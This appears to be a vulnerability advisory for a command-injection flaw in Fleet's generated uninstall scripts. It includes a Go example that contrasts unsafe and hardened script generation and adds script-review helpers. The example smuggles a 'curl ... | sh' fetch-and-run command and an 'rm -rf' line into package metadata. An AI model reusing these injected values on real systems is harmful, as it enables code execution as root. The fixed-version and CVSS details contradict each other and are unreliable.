Arbitrary Command Execution Vulnerability in Fleet Device Management Software
CVE-2026-26191

6 (MEDIUM)

Key Information:

Vendor: Fleetdm
Status: Vendor
CVE Published: 14 May 2026

What is CVE-2026-26191?

Fleet is an open-source device management platform for monitoring and managing endpoints, and it can install and uninstall software on enrolled hosts. In versions before 4.81.0, Fleet's software installer pipeline extracted metadata from an uploaded installer and inserted it into the uninstall script it generates for that package without sufficient sanitization. Because the generated uninstall script runs with elevated privileges on the host, an attacker who can get a crafted package uploaded to Fleet can place shell commands in the package's metadata and have them executed as root on macOS and Linux, or as SYSTEM on Windows, when the package is uninstalled. The fix is to upgrade to Fleet 4.81.0 or later. Until then, administrators should only upload software packages from sources they have verified, and should review the automatically generated uninstall script for each package before it is deployed, looking for metadata that reaches a command line without quoting or that contains shell metacharacters.
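The following Go program is an added illustration of the weakness class described above and of the two mitigations the advisory suggests (fix the generator; review generated scripts). It is not Fleet's code: the PackageMeta type, its field names, the one-line pkgutil-based script template and the malicious metadata are all constructed for the example. It shows a generator that interpolates metadata unquoted, the hardened form that allowlists the identifier and shell-quotes it (and neutralises line breaks in anything that lands in a comment, where quoting cannot help), and two small checks an administrator could run over a generated uninstall script before approving it.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// PackageMeta is a constructed stand-in for the metadata an installer
// pipeline extracts from an uploaded package. Field names are hypothetical,
// not Fleet's own types.
type PackageMeta struct {
	Name  string // human-readable package name, shown in a script comment
	PkgID string // package identifier passed to pkgutil --forget on macOS
}

// ErrBadIdentifier is returned when metadata fails the allowlist.
var ErrBadIdentifier = errors.New("package identifier contains characters outside the allowlist")

// identRe is a conservative allowlist for package identifiers
// (reverse-DNS style such as com.example.notes).
var identRe = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]*$`)

// UnsafeUninstallScript reproduces the weakness class: untrusted metadata is
// pasted into a root-run shell script with no validation or quoting.
func UnsafeUninstallScript(m PackageMeta) string {
	return fmt.Sprintf("#!/bin/sh\n# uninstall %s\npkgutil --forget %s\n", m.Name, m.PkgID)
}

// ShellQuote wraps s in single quotes so POSIX sh treats it as one literal
// word; an embedded single quote becomes '\'' (close, escaped quote, reopen).
func ShellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// commentSafe strips line breaks so a value placed in a # comment cannot
// terminate the comment and start a new command line. Quoting does not help
// inside comments, which is why this is a separate step.
func commentSafe(s string) string {
	return strings.NewReplacer("\r", " ", "\n", " ").Replace(s)
}

// SafeUninstallScript is the hardened form: validate the identifier against
// an allowlist, quote everything that reaches a command line, and neutralise
// line breaks in anything that reaches a comment.
func SafeUninstallScript(m PackageMeta) (string, error) {
	if !identRe.MatchString(m.PkgID) {
		return "", fmt.Errorf("%w: %q", ErrBadIdentifier, m.PkgID)
	}
	return fmt.Sprintf("#!/bin/sh\n# uninstall %s\npkgutil --forget %s\n",
		commentSafe(m.Name), ShellQuote(m.PkgID)), nil
}

// CommandLines returns the lines of a script that the shell would execute
// (non-blank, not comments). The template above legitimately has exactly one,
// so any other count means metadata broke out of its slot.
func CommandLines(script string) []string {
	var cmds []string
	for _, line := range strings.Split(script, "\n") {
		t := strings.TrimSpace(line)
		if t != "" && !strings.HasPrefix(t, "#") {
			cmds = append(cmds, t)
		}
	}
	return cmds
}

// UnquotedMetachars lists shell metacharacters that appear outside single
// quotes and outside comments. It is a deliberately small lexer (single
// quotes and # comments only, no backslash handling), which covers what the
// generator above emits and is enough to triage a script before approval.
func UnquotedMetachars(script string) []string {
	var found []string
	inSingle, inComment := false, false
	for i := 0; i < len(script); i++ {
		c := script[i]
		switch {
		case inComment:
			inComment = c != '\n'
		case inSingle:
			inSingle = c != '\''
		case c == '\'':
			inSingle = true
		case c == '#' && (i == 0 || script[i-1] == '\n' || script[i-1] == ' ' || script[i-1] == '\t'):
			inComment = true
		case strings.IndexByte(";|&`$<>()", c) >= 0:
			found = append(found, string(c))
		}
	}
	return found
}

func main() {
	// Constructed malicious metadata: a newline in the name escapes the
	// comment, and metacharacters in the identifier chain a second command.
	evil := PackageMeta{
		Name:  "Notes\nrm -rf /tmp/evil-demo",
		PkgID: "com.example.notes; curl -s http://127.0.0.1:8000/x | sh",
	}
	unsafe := UnsafeUninstallScript(evil)
	fmt.Printf("unsafe: %d command lines, metachars %v\n", len(CommandLines(unsafe)), UnquotedMetachars(unsafe))

	if _, err := SafeUninstallScript(evil); err != nil {
		fmt.Println("safe:", err)
	}
	good, _ := SafeUninstallScript(PackageMeta{Name: "It's Notes", PkgID: "com.example.notes"})
	fmt.Printf("safe:   %d command lines, metachars %v\n", len(CommandLines(good)), UnquotedMetachars(good))
}
```

The allowlist is the primary control and the quoting is defence in depth: an identifier that fails the regexp never reaches the template, and anything that does pass is still emitted as a single literal word. The two review helpers are intentionally template-specific; for a generator with several command lines, compare the count against that template's expected number rather than against one.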

Affected Version(s)

fleet < 4.81.1

CVSS v4

Score: 6
Severity: MEDIUM
Confidentiality: None
Integrity: High
Availability: None
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: Physical
Privileges Required: Undefined
User Interaction: Unknown

Timeline

  • Vulnerability reserved

  • Vulnerability published: 14 May 2026
